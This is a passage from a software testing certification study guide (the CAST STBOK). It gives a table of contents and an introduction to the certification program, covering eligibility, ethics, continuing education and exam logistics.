Cast Stbok V14-2
Table of Contents
Introduction to the Software Testing Certification
Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-1
Intro.1.Software Certification Overview . . . . . . . . . . . . . . . . Intro-2
Intro.1.1.Contact Us . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-3
Intro.1.2.Program History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-3
Intro.1.3.Why Become Certified? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-3
Intro.1.4.Benefits of Becoming Certified . . . . . . . . . . . . . . . . . . . . . . . . . Intro-3
Intro.2.Meeting the Certification Qualifications . . . . . . . . . . Intro-7
Intro.2.1.Prerequisites for Candidacy . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-7
Intro.2.2.Code of Ethics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-9
Intro.2.3.Submitting the Initial Application . . . . . . . . . . . . . . . . . . . . . . . Intro-11
Intro.2.4.Application-Examination Eligibility Requirements . . . . . . . . . . Intro-12
Intro.3.Scheduling with Pearson VUE to Take
the Examination . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-13
Intro.3.1.Arriving at the Examination Site . . . . . . . . . . . . . . . . . . . . . . . Intro-13
Intro.4.How to Maintain Competency and
Improve Value . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-13
Intro.4.1.Continuing Professional Education . . . . . . . . . . . . . . . . . . . . . Intro-14
Intro.4.2.Advanced Software Testing Designations . . . . . . . . . . . . . . . Intro-14
Skill Category 1
Software Testing Principles and Concepts . . . . . 1-1
1.1.Vocabulary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2
1.2.Quality Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2
1.2.1.Quality Assurance Versus Quality Control . . . . . . . . . . . . . . . . . . . . . 1-2
1.2.2.Quality, A Closer Look . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-4
1.2.3.What is Quality Software? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-5
1.2.4.The Cost of Quality . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-8
1.2.5.Software Quality Factors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-11
1.3.Understanding Defects . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-13
1.3.1.Software Process Defects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-14
1.3.2.Software Process and Product Defects . . . . . . . . . . . . . . . . . . . . . . 1-14
1.4.Process and Testing Published Standards . . . . . . . . . . . . 1-15
1.4.1.CMMI® for Development . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-16
1.4.2.TMMi Test Maturity Model integration . . . . . . . . . . . . . . . . . . . . . . 1-17
Skill Category 2
Building the Software Testing Ecosystem . . . . . . 2-1
2.1.Management’s Role . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-1
2.1.1.Setting the Tone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-2
2.1.2.Commitment to Competence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-3
2.1.3.The Organizational Structure Within the Ecosystem . . . . . . . . . . . . . 2-3
2.1.4.Meeting the Challenge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4
2.2.Work Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4
2.2.1.What is a Process? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-5
2.2.2.Components of a Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-5
2.2.3.Tester’s Workbench . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-6
2.2.4.Responsibility for Building Work Processes . . . . . . . . . . . . . . . . . . . 2-8
2.2.5.Continuous Improvement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-9
2.2.6.SDLC Methodologies Impact on the Test Process . . . . . . . . . . . . . 2-11
2.2.7.The Importance of Work Processes . . . . . . . . . . . . . . . . . . . . . . . . 2-12
2.3.Test Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-13
2.3.1.What is the Test Environment? . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-13
2.3.2.Why do We Need a Test Environment? . . . . . . . . . . . . . . . . . . . . . 2-13
2.3.3.Establishing the Test Environment . . . . . . . . . . . . . . . . . . . . . . . . . 2-14
2.3.4.Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-15
2.3.5.Control of the Test Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-16
2.4.Test Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-16
2.4.1.Categories of Test Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-17
2.4.2.Advantages and Disadvantages of Test Automation . . . . . . . . . . . . 2-20
2.4.3.What Should Be Automated . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-21
2.5.Skilled Team . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-22
2.5.1.Types of Skills . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-22
2.5.2.Business Domain Knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-24
2.5.3.Test Competency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-25
Skill Category 3
Managing the Test Project . . . . . . . . . . . . . . . . . . . 3-1
3.1.Test Administration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-1
3.1.1.Test Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-2
3.1.2.Estimation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-2
3.1.3.Developing a Budget for Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-3
3.1.4.Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4
3.1.5.Resourcing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5
3.2.Test Supervision . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5
Skill Category 4
Risk in the Software Development Life Cycle . . .4-1
4.1.Risk Concepts and Vocabulary . . . . . . . . . . . . . . . . . . . . . . 4-1
4.1.1.Risk Categories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4-2
4.1.2.Risk Vocabulary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4-3
Skill Category 5
Test Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-1
5.1.The Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-1
5.1.1.Advantages to Utilizing a Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . .5-2
5.1.2.The Test Plan as a Contract and a Roadmap . . . . . . . . . . . . . . . . . . .5-2
5.2.Prerequisites to Test Planning . . . . . . . . . . . . . . . . . . . . . . . 5-2
5.2.1.Objectives of Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-3
5.2.2.Acceptance Criteria . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-3
5.2.3.Assumptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-3
5.2.4.Team Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-3
5.2.5.Constraints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-4
5.2.6.Understanding the Characteristics of the Application . . . . . . . . . . . . .5-4
5.3.Hierarchy of Test Plans . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-5
5.4.Create the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-7
5.4.1.Build the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-8
5.4.2.Write the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-11
5.4.3.Changes to the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-18
5.4.4.Attachments to the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-19
5.5.Executing the Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-19
Skill Category 6
Walkthroughs, Checkpoint Reviews,
and Inspections . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-1
6.1.Purpose of Reviews . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1
6.1.1.Emphasize Quality throughout the SDLC . . . . . . . . . . . . . . . . . . . . . .6-2
6.1.2.Detect Defects When and Where they are Introduced . . . . . . . . . . . .6-2
6.1.3.Opportunity to Involve the End User/Customer . . . . . . . . . . . . . . . . . .6-3
6.1.4.Permit “Midcourse” Corrections . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3
6.2.Review Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-4
Skill Category 7
Designing Test Cases . . . . . . . . . . . . . . . . . . . . . . 7-1
7.1.Identifying Test Conditions . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1
7.1.1.Defining Test Conditions from Specifications . . . . . . . . . . . . . . . . . . 7-2
7.1.2.Defining Test Conditions from the Production Environment . . . . . . . 7-3
7.1.3.Defining Test Conditions from Test Transaction Types . . . . . . . . . . . 7-4
7.1.4.Defining Test Conditions from Business Case Analysis . . . . . . . . . 7-21
7.1.5.Defining Test Conditions from Structural Analysis . . . . . . . . . . . . . . 7-22
7.2.Test Conditions from Use Cases . . . . . . . . . . . . . . . . . . . . 7-22
7.2.1.What is a Use Case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-22
7.2.2.How Use Cases are Created . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-26
7.2.3.Use Case Format . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-28
7.2.4.How Use Cases are Applied . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-30
7.2.5.Develop Test Cases from Use Cases . . . . . . . . . . . . . . . . . . . . . . . 7-30
7.3.Test Conditions from User Stories . . . . . . . . . . . . . . . . . . . 7-31
7.3.1.INVEST in User Stories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-32
7.3.2.Acceptance Criteria and User Stories . . . . . . . . . . . . . . . . . . . . . . . 7-33
7.3.3.Acceptance Criteria, Acceptance Tests, and User Stories . . . . . . . 7-33
7.3.4.User Stories Provide a Perspective . . . . . . . . . . . . . . . . . . . . . . . . . 7-33
7.3.5.Create Test Cases from User Stories . . . . . . . . . . . . . . . . . . . . . . . 7-33
7.4.Test Design Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-34
7.4.1.Structural Test Design Techniques . . . . . . . . . . . . . . . . . . . . . . . . . 7-35
7.4.2.Functional Test Design Techniques . . . . . . . . . . . . . . . . . . . . . . . . 7-41
7.4.3.Experience-based Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-47
7.4.4.Non-Functional Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-48
7.5.Building Test Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-50
7.5.1.Process for Building Test Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-50
7.5.2.Documenting the Test Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-51
7.6.Test Coverage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-53
Skill Category 8
Executing the Test Process . . . . . . . . . . . . . . . . . .8-1
8.1.Acceptance Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-1
8.1.1.Fitness for Use . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-2
8.2.IEEE Test Procedure Specification . . . . . . . . . . . . . . . . . . . 8-2
8.3.Test Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-3
8.3.1.Test Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-4
8.3.2.Test Cycle Strategy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-4
8.3.3.Test Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-4
8.3.4.Use of Tools in Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-7
8.3.5.Test Documentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-7
8.3.6.Perform Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-7
8.3.7.Unit Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-11
8.3.8.Integration Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-12
8.3.9.System Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-14
8.3.10.User Acceptance Testing (UAT) . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-15
8.3.11.Testing COTS Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-15
8.3.12.Acceptance Test the COTS Software . . . . . . . . . . . . . . . . . . . . . . . 8-16
8.3.13.When is Testing Complete? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-16
8.4.Testing Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-17
8.4.1.Environmental versus Transaction Processing Controls . . . . . . . . . . 8-17
8.4.2.Environmental or General Controls . . . . . . . . . . . . . . . . . . . . . . . . . . 8-17
8.4.3.Transaction Processing Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-18
8.5.Recording Test Results . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-24
8.5.1.Deviation from what should be . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-25
8.5.2.Effect of a Defect . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-27
8.5.3.Defect Cause . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-27
8.5.4.Use of Test Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-28
8.6.Defect Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-28
8.6.1.Defect Naming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-29
Skill Category 9
Measurement, Test Status, and Reporting . . . . . .9-1
9.1.Prerequisites to Test Reporting . . . . . . . . . . . . . . . . . . . . . . 9-1
9.1.1.Define and Collect Test Status Data . . . . . . . . . . . . . . . . . . . . . . . . . .9-2
9.1.2.Define Test Measures and Metrics used in Reporting . . . . . . . . . . . .9-3
9.1.3.Define Effective Test Measures and Metrics . . . . . . . . . . . . . . . . . . . .9-5
Skill Category 10
Testing Specialized Technologies . . . . . . . . . . . 10-1
10.1.New Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-2
10.1.1.Risks Associated with New Technology . . . . . . . . . . . . . . . . . . . . 10-2
10.1.2.Testing the Effectiveness of Integrating New Technology . . . . . . . 10-3
10.2.Web-Based Applications . . . . . . . . . . . . . . . . . . . . . . . . . . 10-4
10.2.1.Understand the Basic Architecture . . . . . . . . . . . . . . . . . . . . . . . . 10-4
10.2.2.Test Related Concerns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-5
10.2.3.Planning for Web-based Application Testing . . . . . . . . . . . . . . . . . 10-6
10.2.4.Identify Test Conditions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-7
10.3.Mobile Application Testing . . . . . . . . . . . . . . . . . . . . . . . 10-11
10.3.1.Characteristics and Challenges of the Mobile Platform . . . . . . . . 10-11
10.3.2.Identifying Test Conditions on Mobile Apps . . . . . . . . . . . . . . . . . 10-13
10.3.3.Mobile App Test Automation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-16
10.4.Cloud Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-17
10.4.1.Defining the Cloud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-17
10.4.2.Testing in the Cloud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-19
10.4.3.Testing as a Service (TaaS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-19
10.5.Testing in an Agile Environment . . . . . . . . . . . . . . . . . . . 10-20
10.5.1.Agile as an Iterative Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-20
10.5.2.Testers Cannot Rely on having Complete Specifications . . . . . . 10-20
10.5.3.Agile Testers must be Flexible . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-20
10.5.4.Key Concepts for Agile Testing . . . . . . . . . . . . . . . . . . . . . . . . . . 10-20
10.5.5.Traditional vs. Agile Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-21
10.5.6.Agile Testing Success Factors . . . . . . . . . . . . . . . . . . . . . . . . . . 10-22
10.6.DevOps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-22
10.6.1.DevOps Continuous Integration . . . . . . . . . . . . . . . . . . . . . . . . . . 10-23
10.6.2.DevOps Lifecycle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-23
10.6.3.Testers Role in DevOps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-24
10.6.4.DevOps and Test Automation . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-24
Appendix A
Vocabulary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A-1
Appendix B
Test Plan Example . . . . . . . . . . . . . . . . . . . . . . . . . B-1
Appendix C
Test Transaction Types Checklists . . . . . . . . . . . C-1
C.1.Field Transaction Types Checklist . . . . . . . . . . . . . . . . . . . C-2
C.2.Records Testing Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . C-4
C.3.File Testing Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C-5
C.4.Relationship Conditions Checklist . . . . . . . . . . . . . . . . . . . C-6
C.5.Error Conditions Testing Checklist . . . . . . . . . . . . . . . . . . C-8
C.6.Use of Output Conditions Checklist . . . . . . . . . . . . . . . . . C-10
C.7.Search Conditions Checklist . . . . . . . . . . . . . . . . . . . . . . . C-11
C.8.Merging/Matching Conditions Checklist . . . . . . . . . . . . . C-12
C.9.Stress Conditions Checklist . . . . . . . . . . . . . . . . . . . . . . . C-14
C.10.Control Conditions Checklist . . . . . . . . . . . . . . . . . . . . . C-15
C.11.Attributes Conditions Checklist . . . . . . . . . . . . . . . . . . . C-18
C.12.Stress Conditions Checklist . . . . . . . . . . . . . . . . . . . . . . C-20
C.13.Procedures Conditions Checklist . . . . . . . . . . . . . . . . . . C-21
Appendix D
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D-1
Introduction to the
Software Testing Certification
Program
The Software Testing Certification program (CAST, CSTE, and CMST) was developed
by leading software testing professionals as a means of recognizing software testers
who demonstrate a predefined level of testing competency. The Software Testing
Certification program is directed by the International Software Certification Board
(ISCB), an independent board, and is administered by the QAI Global Institute (QAI). The
program was developed to provide value to the profession, the individual, the employer, and
co-workers.
The CAST, CSTE, and CMST certifications test the level of competence in the principles and
practices of testing and control in the Information Technology (IT) profession. These
principles and practices are defined by the ISCB as the Software Testing Body of Knowledge
(STBOK). The ISCB periodically updates the STBOK to reflect changes in software testing
and control practices, as well as changes in computer technology. These updates occur
approximately every three years.
Be sure to check the Software Certifications Web site for up-to-date information
on the Software Testing Certification program at:
www.softwarecertifications.org
Using this product does not constitute, nor imply, the successful passing of the
certification examination.
The Software Testing Certification programs establish standards for initial qualification and
the continuing improvement of professional competence.
The certification programs help to:
1. Define the tasks (skill categories) associated with software testing duties in order to evaluate skill mastery.
2. Demonstrate an individual’s willingness to improve professionally.
3. Acknowledge attainment of an acceptable standard of professional competency.
4. Aid organizations in selecting and promoting qualified individuals.
5. Motivate personnel having software testing responsibilities to maintain their professional
competency.
6. Assist individuals in improving and enhancing their organization’s software testing programs (i.e., provide a mechanism to lead a professional).
In addition to Software Testing Certification, the ISCB also offers the following software
certifications.
Software Testers
• Certified Associate in Software Testing (CAST)
• Certified Software Tester (CSTE)
• Certified Manager of Software Testing (CMST)
Intro.1.1 Contact Us
Software Certifications
Phone: (407)-472-8100
Fax: (407)-363-1112
Software testing is often viewed as a software project task, even though many individuals are
full-time testing professionals. The Software Testing Certification program was designed to
recognize software testing professionals by providing:
• Code of Ethics
The successful candidate must agree to abide by a professional Code of Ethics as specified
by the ISCB. See “Code of Ethics” on page 9 for an explanation of the ethical behaviors
expected of all certified professionals.
The individual obtaining the CSTE certification receives the following values:
• Recognition by Peers of Personal Desire to Improve
Approximately seventy-five percent (75%) of all CSTEs stated that a personal desire for
self-improvement and peer recognition was the main reason for obtaining the CSTE
certification. Fifteen percent (15%) were required by their employer to sit for the
examination, and ten percent (10%) were preparing themselves for an improved testing-
related position.
Many CSTEs indicated that while their employer did not require CSTE certification, it
was strongly encouraged.
• Increased Confidence in Personal Capabilities
Eighty-five percent (85%) of the CSTEs stated that passing the examination increased
their confidence to perform their job more effectively. Much of that confidence came from
studying for the examination.
• Recognition by IT Management for Professional Achievement
Most CSTEs stated that their management greatly respects those who put forth the
personal effort needed for self-improvement. IT organizations recognized and rewarded
individuals in the following ways:
• Thirteen percent (13%) received an immediate average one-time bonus of $610, with a
range of $250 to $2,500.
• Twelve percent (12%) received an immediate average salary increase of 10%, with a
range of 2% to 50%.
With the need for increased software testing and reliability, companies employing certified
testers provide value in these ways:
Certified Testers use their knowledge and skills to continuously improve the IT work
processes. They know what to measure, how to measure it, and then prepare an analysis to aid
in the decision-making process.
The Software Testing Certification program is directed by the ISCB. Through examination
and recertification, they provide an independent assessment of one’s testing competencies,
based on a continuously strengthening Software Testing Body of Knowledge.
From an IT director’s perspective, this is employee-initiated testing training. Most, if not all,
testers do this training during their personal time. IT organizations gain three benefits from
recertification: 1) employees initiate improvement; 2) testing practitioners obtain
competencies in testing methods and techniques; and 3) employees train during personal time.
The drive for self-improvement is a special trait that manifests itself in providing these values
to co-workers:
Forty-five percent (45%) of the CSTEs mentor their testing colleagues by conducting training
classes, encouraging staff to become certified, and acting as a resource to the staff on sources
of IT testing-related information.
CSTEs and CMSTs are recognized as experts in testing and are used heavily for advice,
counseling, and for recommendations on software construction and testing.
CSTEs and CMSTs are the IT role models for individuals with testing responsibilities to
become more effective in performing their job responsibilities.
Intro.2.1.1.1 CAST
To qualify for candidacy, each applicant must meet one of the “rule of 3’s” credentials listed
below:
Intro.2.1.1.2 CSTE
To qualify for candidacy, each applicant must meet one of the “rule of 6’s” credentials listed
below:
1. A four-year degree from an accredited college-level institution and two years of experience in the information services field.
2. A three-year degree from an accredited college-level institution and three years of experience in the information services field.
3. A two-year degree from an accredited college-level institution and four years of experience in the information services field.
4. Six years of experience in the information services field.
Intro.2.1.1.3 CMST
To qualify for candidacy, each applicant must meet one of the “rule of 8’s” credentials listed
below:
Knowledge within a profession doesn't stand still. Having passed the certification
examination, a certificant has demonstrated knowledge of the designation's STBOK at the
point in time of the examination. In order to stay current in the field, as knowledge and
techniques mature, the certificant must be actively engaged in professional practice, and seek
opportunities to stay aware of, and learn, emerging practices.
The certified tester is required to submit 120 credit hours of Continuing Professional
Education (CPE) every three years to maintain certification or take an examination for
recertification. Any special exceptions to the CPE requirements are to be directed to Software
Certifications. Certified professionals are generally expected to:
• Attend professional conferences to stay aware of activities and trends in the
profession.
• Take education and training courses to continually update skills and competencies.
• Develop and offer training to share knowledge and skills with other professionals and
the public.
• Publish information in order to disseminate personal, project, and research
experiences.
• Participate in the profession through active committee memberships and formal
special interest groups.
The certified tester is expected not only to possess the skills required to pass the certification
examination but also to be a change agent: someone who can change the culture and work
habits of individuals (or someone who can act in an advisory position to upper management)
to make quality in software testing happen.
In preparing yourself for the profession of IT software testing and to become more effective in
your current job, you need to become aware of the three C’s of today's workplace:
• Change – The speed of change in technology and in the way work is performed is
accelerating. Without continuous skill improvement, you will become obsolete in the
marketplace.
• Complexity – Information technology is becoming more complex, not less complex.
Thus, achieving quality, with regard to software testing in the information technology
environment, will become more complex. You must update your skill proficiency in
order to deal with this increased complexity.
• Competition – The ability to demonstrate mastery of multiple skills makes you a more
desirable candidate for any professional position. While hard work does not guarantee
your success, few, if any, achieve success without hard work. A software testing
certification is one form of achievement. A software testing certification is proof that
you’ve mastered a basic skill set recognized worldwide in the information technology
arena.
Become a lifelong learner in order to perform your current job effectively and remain
marketable in an era of the three C’s. You cannot rely on your current knowledge to meet
tomorrow's job demands. The responsibility for success lies within your own control.
Perhaps the most important single thing you can do to improve yourself
professionally and personally is to develop a lifetime learning habit.
Intro.2.2.1 Purpose
Intro.2.2.2 Responsibility
This Code of Ethics is applicable to all certified by the ISCB. Acceptance of any certification
designation is a voluntary action. By acceptance, those certified assume an obligation of self-
discipline beyond the requirements of laws and regulations.
The standards of conduct set forth in this Code of Ethics provide basic principles in the
practice of information services testing. Those certified should realize that their individual
judgment is required in the application of these principles.
Those certified shall use their respective designations with discretion and in a dignified
manner, fully aware of what the designation denotes. The designation shall also be used in a
manner consistent with all statutory requirements.
Those certified who are judged by the ISCB to be in violation of the standards of conduct of
the Code of Ethics shall be subject to forfeiture of their designation.
10. In the practice of their profession, shall be ever mindful of their obligation to maintain the
high standards of competence, morality, and dignity promulgated by this Code of Ethics.
11. Maintain and improve their professional competency through continuing education.
12. Cooperate in the development and interchange of knowledge for mutual professional benefit.
13. Maintain high personal standards of moral responsibility, character, and business integrity.
The entire STBOK is provided in Skill Category 1 through Skill Category 10. A
comprehensive list of related references is provided in the appendices.
• Current experience in the field covered by the certification designation.
• Significant experience and breadth to have mastered the basics of the entire STBOK.
• Prepared to take the required examination and therefore ready to schedule and take the
examination.
Candidates for certification who rely on only limited experience, or upon too few or specific
study materials, typically do not successfully obtain certification. Many drop out without ever
taking the examination. Fees in this program are nonrefundable.
Do not apply for CSTE or CMST unless you feel confident that your work
activities and past experience have prepared you for the examination process.
Applicants already holding a certification from the ISCB must still submit a new application
when deciding to pursue an additional certification. For example, an applicant already holding
a CSQA or CSBA certification must still complete the application process if pursuing the
CSTE certification.
It is critical that candidates keep their on-line profile up-to-date. Many candidates change their
residence or job situations during their certification candidacy. If any such changes occur, it is
the candidate's responsibility to login to the Software Certification Customer Portal and
update their profile as appropriate.
If the examination is taken within that 12-month period, the original application period is
extended by another year, with two additional attempts allowed if required. Candidates for certification
must pass a two-part examination in order to obtain certification. The examination tests the
candidate's knowledge and practice of the competency areas defined in the STBOK.
Candidates who do not successfully pass the examination may re-take the examination up to
two times by logging into the Software Certification’s Customer Portal and selecting the
retake option and paying all required fees.
Technical knowledge becomes obsolete quickly; therefore the board has established these
eligibility guidelines. The goal is to test on a consistent and comparable knowledge base
worldwide. The eligibility requirements have been developed to encourage candidates to
prepare and pass all portions of the examination in the shortest time possible.
Intro.3.1.1 No-shows
Candidates who fail to appear for a scheduled examination – initial or retake – are marked as
NO SHOW and must submit an on-line Examination Re-sit request to apply for a new
examination date. If a candidate needs to change the date and/or time of their certification
exam, they must log in directly to the Pearson VUE site to request the change. All changes
must be made 24 hours before the scheduled exam or a re-sit fee will be required.
You should develop an annual plan to improve your personal competencies. Getting 120 hours
of continuing professional education will enable you to recertify your Software Testing
designation.
The drivers for improving performance in IT are the quality assurance and quality control
(testing) professionals. Dr. W. Edwards Deming recognized this “do-check” partnership of
quality professionals in his “14 points” as the primary means for implementing the change
needed to mature. Quality control identifies the impediments to quality and quality assurance
facilitates the fix. Listed below are the certification levels, the emphasis of each certification, and
how you can demonstrate that competency.
• CAST
Demonstrate competency in knowing what to do.
Study for, and pass, a one-part examination designed to evaluate the candidate’s
knowledge of the principles and concepts incorporated into the STBOK.
• CSTE
Demonstrate competency in knowing what to do and how to do it.
Study for, and pass, a two-part examination designed to evaluate the candidate’s
knowledge of the principles and concepts incorporated into the STBOK, plus the ability to
relate those principles and concepts to the challenges faced by IT organizations.
• CMST
Demonstrate competency in knowing how to solve management level challenges.
Candidates must demonstrate their ability to develop real solutions to challenges in their
IT organizations, by proposing a solution to a real-world management problem.
Skill Category 1
Software Testing Principles and Concepts
The “basics” of software testing are represented by the vocabulary of testing, testing
approaches, methods and techniques, as well as the materials used by testers in
performing their test activities.
Vocabulary 1-2
Quality Basics 1-2
Understanding Defects 1-14
Process and Testing Published Standards 1-15
Software Testing 1-17
Software Development Life Cycle (SDLC) Models 1-28
Agile Development Methodologies 1-42
Testing Throughout the Software Development Life Cycle (SDLC) 1-46
Testing Schools of Thought and Testing Approaches 1-52
Test Categories and Testing Techniques 1-55
1.1 Vocabulary
Key terms: Terminology, Quality, Testing, Quality Assurance

A unique characteristic of a profession is its vocabulary. The profession’s vocabulary
represents the knowledge of the profession and its ability to communicate with others about
the profession’s knowledge. For example, in the medical profession one hundred years ago
doctors referred to “evil spirits” as a diagnosis. Today the medical profession has added words
such as cancer, AIDS, and stroke, which communicate knowledge.
This Software Testing Body of Knowledge (STBOK) defines many terms used by software testing
